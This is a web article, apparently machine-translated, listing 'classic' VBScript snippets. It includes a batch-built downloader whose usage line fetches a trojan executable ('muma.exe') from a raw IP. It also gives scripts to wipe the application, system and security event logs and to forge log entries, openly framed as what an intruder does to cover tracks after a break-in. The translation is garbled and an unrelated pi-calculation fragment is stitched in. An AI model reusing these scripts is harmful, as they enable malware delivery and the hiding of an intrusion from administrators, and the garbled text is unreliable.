Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

What are the classic vbs scripts?

2025-01-19 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Development >

Share

Shulou(Shulou.com)06/03 Report--

This article mainly explains "what are the classic vbs scripts". The content of the explanation is simple and clear, and it is easy to learn and understand. Please follow the editor's train of thought to study and learn what classic vbs scripts are there.

1. File download (no echo)

Echo iLocal = LCase (WScript.Arguments (1)) > iget.vbe

Echo iRemote = LCase (WScript.Arguments (0)) > > iget.vbe

Echo Set xPost = createObject ("Microsoft.XMLHTTP") > > iget.vbe

Echo xPost.Open "GET", iRemote,0 > > iget.vbe

Echo xPost.Send () > > iget.vbe

Echo Set sGet = createObject ("ADODB.Stream") > > iget.vbe

Echo sGet.Mode = 3 > > iget.vbe

Echo sGet.Type = 1 > > iget.vbe

Echo sGet.Open () > > iget.vbe

Echo sGet.Write (xPost.responseBody) > > iget.vbe

Echo sGet.SaveToFile iLocal,2 > > iget.vbe

Usage: cscript hget.vbs http://111.111.111.111/muma.exe muma.exe

two。 Enumerate processes

@ echo for each ps in getobject _ > ps.vbs

@ echo ("winmgmts:\\.\ root\ cimv2:win32_process") .instances_ > > ps.vbs

@ echo wscript.echo ps.handle^ & vbtab^ & ps.name ^ & vbtab^ & ps.executablepath:next > > ps.vbs

Usage: cscript ps.vbs

3. Terminate the process

@ echo for each ps in getobject _ > pskill.vbs

@ echo ("winmgmts:\\.\ root\ cimv2:win32_process") .instances_ > > pskill.vbs

@ echo if ps.handle=wscript.arguments (0) then wscript.echo ps.terminate:end if:next > > pskill.vbs

Usage: cscript pskill.vbs pid

4. Restart the system

@ echo for each os in getobject _ > reboot.vbs

@ echo ("winmgts cimv2:win32_operatingsystem!\\.\ root\ cimv2:win32_operatingsystem") .instances_ > > reboot.vbs

@ echo os.win32shutdown (2): next > > reboot.vbs

Usage: cscript reboot.vbs

Eight ingenious applications of VBS script in system Security

The massive prevalence of VBS scripting viruses has given us a new understanding of the functions of VBS, and now people are beginning to pay attention to it. The VBS code is executed locally through Windows Script Host (WSH) interpretation. The execution of VBS scripts is inseparable from WSH,WSH, which is a language-independent script interpretation mechanism based on 32-bit Windows platform provided by Microsoft, which enables scripts to run directly from the Windows desktop or command prompt. With WSH, users can manipulate WSH objects, ActiveX objects, the registry, and file systems. Under Windows 2000, you can also use WSH to access the Windows NT active Directory service.

Scripts written in VBS are interpreted and executed by wscript.exe files in the window interface and cscript.exe files in the character interface. Wscript.exe is a scripting language interpreter that allows scripts to be executed just like batch processing. You must be much more familiar with VBS than I am, so no more nonsense, just get to the topic and take a look at my summary of the eight wonderful uses of VBS in system security.

Unlock the registry editor

Use notepad to edit the following:

DIM WSH

SET WSH=WSCRIPT.CreateObject ("WSCRIPT.SHELL") 'inactivate WScript.Shell object

WSH.POPUP ("unlock Registry Editor!")

'Show the pop-up message "unlock Registry Editor!"

WSH.Regwrite "HKCU\ Software\ Microsoft\ Windows\ CurrentVersion

\ Policies\ System\ DisableRegistryTools ", 0," REG_DWORD "

'Unlock the registry editor

WSH.POPUP ("registry unlocked successfully!")

'displays the pop-up message "Registry unlocked successfully!"

Save to a file with a .vbs extension and double-click when you use it.

2. Disable the default sharing of Win NT/2000

Use notepad to edit the following:

Dim WSHShell' defines variables

Set WSHShell=CreateObject ("WScript.shell") 'create an object WSHShell that can communicate with the operating system

Dim fso,dc

Set fso=CreateObject ("Scripting.FileSystemObject") 'create a file system object

Set dc=fso.Drives' get all drive letters

For Each d in dc

Dim str

WSHShell.run ("net share" & d.driveletter & "$/ delete") 'turns off hidden sharing for all drives

Next

WSHShell.run ("net share admin$ / delete")

WSHShell.run ("net share ipc$ / delete") 'turns off admin$ and ipc$ pipe sharing

Now to test it, open cmd.exe first, enter the net share command and you can see the share on your machine. When you double-click to execute stopshare.vbs, you will see the window flash by. Then type the net share command in cmd, and no share list is found.

3. Display the local IP address

There are many times, we need to know the local IP address, although it can be done with a variety of software, but it is also very convenient to use VBS scripts. Use notepad to edit the following:

Dim WS

Set WS=CreateObject ("MSWinsock.Winsock")

IPAddress=WS.LocalIP

MsgBox "Local IP=" & IPAddress

Save the above as ShowIP.vbs, and double-click to execute to get the native IP address.

Use script programming to delete logs

The first thing a hacker does after a successful intrusion into the system is to clear the log. If you remotely control the other machine or log in from the terminal with a graphical interface, it is not difficult to delete the log. Although the log is also run as a service, it is different from a service like http,ftp, which can be stopped and then deleted under the command line. Using net stop eventlog under the command line cannot be stopped. So some people think that it is very difficult to delete logs under the command line, but in fact this is not the case. For example, you can delete logs by using VMI in scripting programming, and it is very simple and convenient. The source code is as follows:

StrComputer= "."

Set objWMIService = GetObject ("winmgmts:" _

& "{impersonationLevel=impersonate, (Backup)}!\" & _

StrComputer & "\ root\ cimv2")

Dim mylogs (3)

Mylogs (1) = "application"

Mylogs (2) = "system"

Mylogs (3) = "security"

For Each logs in mylogs

Set colLogFiles=objWMIService.ExecQuery _

("Select * from Win32_NTEventLogFile where LogFileName='" & logs& "'")

For Each objLogfile in colLogFiles

ObjLogFile.ClearEventLog ()

Next

Next

Just save the above code as a cleanevent.vbs file. In the above code, you first get the object object, and then use its clearEventLog () method to delete the log. Create an array, application,security,system, and join the array if there are other logs. Then use a for loop to delete each element in the array, that is, each log.

Fifth, use scripts to forge logs

After deleting the log, any intelligent administrator will immediately react to being hacked in the face of an empty log, so a smart hacker learns how to forge a log. Creating a log using the eventlog method in scripting is very simple, take a look at the following code:

Set ws=wscript.createobject ("Wscript.shell")

Ws.logevent 0, "write log success" 'create a successful execution log

Just save the above code as createlog.vbs. This code is easy to understand, first getting a shell object of wscript, and then using the logevent method of the shell object. Usage of logevent: logevent eventtype, "description" [, remote system], where eventtype is a log type. The parameters that can be used are as follows: 0 indicates successful execution, 1 execution error, 2 warnings, 4 messages, 8 successful audit, 16 fault audit. So in the above code, change 0 to 1, 2, 4, 8, 16, and the contents in quotation marks are log descriptions. The log written by this method has a disadvantage, that is, it can only be written to the application log, and the log source can only be WSH, that is, Windows Scripting Host, so it can not play too much hidden role, here for your reference only.

Disable the start menu option

Use notepad to edit the following:

Dim ChangeStartMenu

Set ChangeStartMenu=WScript.CreateObject ("WScript.Shell")

RegPath= "HKCR\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\"

Type_Name= "REG_DWORD"

Key_Data=1

StartMenu_Run= "NoRun"

StartMenu_Find= "NoFind"

StartMenu_Close= "NoClose"

Sub Change (Argument)

ChangeStartMenu.RegWrite RegPath&Argument,Key_Data,Type_Name

MsgBox ("Success!")

End Sub

Call Change (StartMenu_Run) 'disable the run feature in the start menu

Call Change (StartMenu_Find) 'disable the find feature in the start menu

Call Change (StartMenu_Close) 'disable the shutdown function on the start menu

Save the above code as a ChangeStartMenu.vbs file and double-click when you use it.

VII. Execute external procedures

Use notepad to edit the following:

DIM objShell

Set objShell=wscript.createObject ("wscript.shell")

IReturn=objShell.Run ("cmd.exe / C set var=world", 1, TRUE)

Just save as a .vbs file. In this code, we first set an environment variable named var, and the value is world, the user can use% Comspec% instead of cmd.exe, and can change the command: set var=world to other commands, so that it can run arbitrary commands.

Restart the specified IIS service

Use notepad to edit the following:

Const ADS_SERVICE_STOPPED = 1

Set objComputer = GetObject ("WinNT://MYCOMPUTER,computer")

Set objService = objComputer.GetObject ("Service", "MYSERVICE")

If (objService.Status = ADS_SERVICE_STOPPED) Then

ObjService.Start

End If

Save it in the root directory of C disk under the name of startsvc.vbs. And execute it with the following command: cscript c:\ startsvc.vbs. After running, the IIS service item you specified will be reopened.

Finally, let's talk about the prevention of VBS scripting viruses mentioned at the beginning. The execution of VBS virus is inseparable from WSH. While bringing convenience to people, WSH also leaves an opportunity for the spread of the virus. So if you want to prevent VBS virus, you can choose to uninstall WSH, just open the control panel, find "add / remove programs", click "Windows installer", and then double-click the "attachments" item, and then remove the "√" of "Windows Scripting Host" in the open window, and then click "OK" twice in a row to uninstall WSH. Alternatively, you can click "my computer" → to view "→" folder options, in the pop-up dialog box, click "File Type", and then delete VBS, VBE, JS, JSE file suffix and application mapping, can achieve the purpose of preventing VBS script virus.

The calculation stops when the absolute value of the last item is less than 0.000001.

Write the following VBScript program code:

Calculate pi

Calculate pi

K = 1: s = 1: t = 1: M = 1

Figure 3-12 calculates pi

While Abs (t) > 0.0000001

K = k + 2

M =-m

T = m / k

S = s + t

Wend

MsgBox "pi π =" & 4 * s

Execute the VBScript program

Note: the program may take a long time to run.

Thank you for your reading, the above is the content of "what are the classic vbs scripts", after the study of this article, I believe you have a deeper understanding of what classic vbs scripts are, and the specific use needs to be verified in practice. Here is, the editor will push for you more related knowledge points of the article, welcome to follow!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Development

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report